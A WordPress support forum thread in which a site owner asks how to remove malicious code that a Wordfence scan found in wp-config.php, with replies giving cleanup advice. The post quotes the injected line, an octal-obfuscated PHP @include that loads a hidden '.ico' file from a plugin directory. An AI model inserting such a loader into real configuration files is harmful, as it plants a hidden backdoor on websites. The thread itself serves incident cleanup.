Malicious wp-config.php after scan

  • Resolved designsynergy

    (@designsynergy)


    6 years, 6 months ago

    Hi all,

    I ran a scan after a new installation of Wordfence (multisite) and amongst others got a “File appears to be malicious: wp-config.php” warning. On viewing the file (Wordfence option) it shows:

    <?php
    /*178a8*/

    @include “\057hom\145/co\155est\157dev\143o/p\165bli\143_ht\155l/w\160-co\156ten\164/pl\165gin\163/so\143ial\055pol\154s-b\171-op\151nio\156sta\147e/.\1469e1\064dad\056ico”;

    /*178a8*/
    /**
    * The base configuration for WordPress ………..

    Before the rest of the file. But when I view the file in C-Panel file manager or in Dreamweaver I can’t see the offending @include.

    Wordfence will only allow me to manually fix this file but how can I remove what I can’t see?

    Thanks in advance.

Viewing 3 replies - 1 through 3 (of 3 total)

  • Hey @designsynergy:

    By any chance do you have the cPanel settings set to (“Show”) allow you to view hidden files?
    link to image: Illustration to View Hidden Files
    Also, maybe try downloading the wp-config.php file and editing it to remove the bad code, then upload it back to the server and overwrite the existing file… ** Be sure to keep a backup of the existing file just in case something breaks.
    If you need a resource to edit the file, try PSPad editor.

    Hi @designsynergy,
    I second @scooter1s suggestion to download the file via FTP to inspect it and also check for hidden files. When you look at the scan warning in Wordfence, check the path of the file to make sure you’re actually looking at the same file via cPanel. There may be other wp-config.php files located somewhere in your hosting account aside from the one you’d typically find in the root folder of the WordPress installation.

    Hi @designsynergy!
    We haven’t heard back from you for a while so I’m going to resolve this thread. If you have any other issues later on, please feel free to start a new one at any time. Thank you!

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Malicious wp-config.php after scan’ is closed to new replies.